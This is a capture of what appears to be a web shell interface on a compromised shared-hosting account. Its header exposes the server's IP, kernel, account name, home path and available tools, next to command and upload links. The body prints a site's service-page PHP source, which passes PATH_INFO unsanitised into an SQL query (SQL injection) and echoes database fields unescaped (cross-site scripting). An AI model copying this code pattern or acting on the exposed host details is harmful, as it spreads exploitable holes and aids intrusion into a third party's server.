Server IP : 103.53.40.154 / Your IP : 3.21.247.78 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/fozan.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); $slug_name = $_GET['slug_url']; if(isset($_SERVER['PATH_INFO'])){ $slug_name=$_SERVER['PATH_INFO']; $querydt="SELECT * FROM `tbl_services` WHERE `slug_url`='$slug_name'"; $rundt = mysqli_query($db,$querydt) or die("Query Not run"); $datadt = mysqli_fetch_assoc($rundt); } ?> <!DOCTYPE html> <html lang="zxx"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <?php include "head-links.php";?> <!--<title>--> <?php if (isset($datadt["meta_title"]) && !empty($datadt["meta_title"])) { echo '<title>'.$datadt["meta_title"].'</title>'; } else { echo '<title>'.$datadt["cat_name"].'</title>'; } ?> <meta name="description" content="<?php echo $datadt["meta_desc"];?>"> </head> <body id="home" class="inner-scroll"> <?php include "header.php";?> <!-- ================ HEADER-TITLE ================ --> <section class="s-header-title"> <div class="container"> <h1><?php echo $datadt["name"];?></h1> <ul class="breadcrambs"> <li><a href="<?php echo $wspath?>">Home</a></li> <li><?php echo $datadt["name"];?></li> </ul> </div> </section> <!-- ============== HEADER-TITLE END ============== --> <!--===================== S-NEWS =====================--> <section class="s-news"> <div class="container"> <div class="row"> <div class="col-sm-12 col-lg-6 blog-cover"> <div class="post-item-cover"> <div class="post-header"> <div class="post-thumbnail"> <!--<a>--> <img src="<?php echo $wspath?>admin/images/property-image/<?php echo $datadt["image"];?>" alt="<?php echo $datadt["name"];?>"> <!--</a>--> </div> </div> </div> </div> <div class="col-sm-12 col-lg-6 blog-cover"> <div class="post-item-cover"> <h4 class="title title-line-left"><?php echo $datadt["name"];?></h4> <div class="post-content"> <div class="text"> <p style="text-align:justify;"><?php echo $datadt["desc"];?></p> </div> </div> <div class="post-footer"> <!--<div class="meta">--> <!-- <span class="post-comment"><a href="#">Comments 2</a></span>--> <!-- <span class="post-tags">Tags: <a href="#">Lorem</a><a href="#">Dorem</a></span>--> <!--</div>--> <a href="<?php echo $wspath?>contact-us.html" class="btn"><span>Contact Us</span></a> </div> </div> </div> <!--================= SIDEBAR =================--> <!--<div class="col-12 col-lg-4 sidebar">--> <!-- <a href="#" class="btn btn-sidebar"><span>Widgets</span></a>--> <!-- <ul class="widgets">--> <!--======== WIDGET-RECENT-POSTS ========--> <!--<li class="widget widget-recent-posts">--> <!-- <h5 class="title">recent blog posts</h5>--> <!-- <ul>--> <!-- <li>--> <!-- <a href="#">Mobile App Design: From Beginner to Intermediate</a>--> <!-- <div class="date"><i class="fa fa-calendar" aria-hidden="true"></i>Dec 27, 2019 at 5:47 pm</div>--> <!-- </li>--> <!-- <li>--> <!-- <a href="#">Et harum quidem rerum facilis est et expedita distinctio</a>--> <!-- <div class="date"><i class="fa fa-calendar" aria-hidden="true"></i>Dec 17, 2018 at 5:47 pm</div>--> <!-- </li>--> <!-- <li>--> <!-- <a href="#">Nam libero tempore, cum soluta nobis est eligendi optio</a>--> <!-- <div class="date"><i class="fa fa-calendar" aria-hidden="true"></i>Dec 8, 2018 at 5:47 pm</div>--> <!-- </li>--> <!-- </ul>--> <!--</li>--> <!--====== WIDGET-RECENT-POSTS END ======--> <!--</div>--> <!--=============== SIDEBAR END ===============--> </div> </div> </section> <!--=================== S-NEWS END ===================--> <?php include "footer.php";?> </body> </html>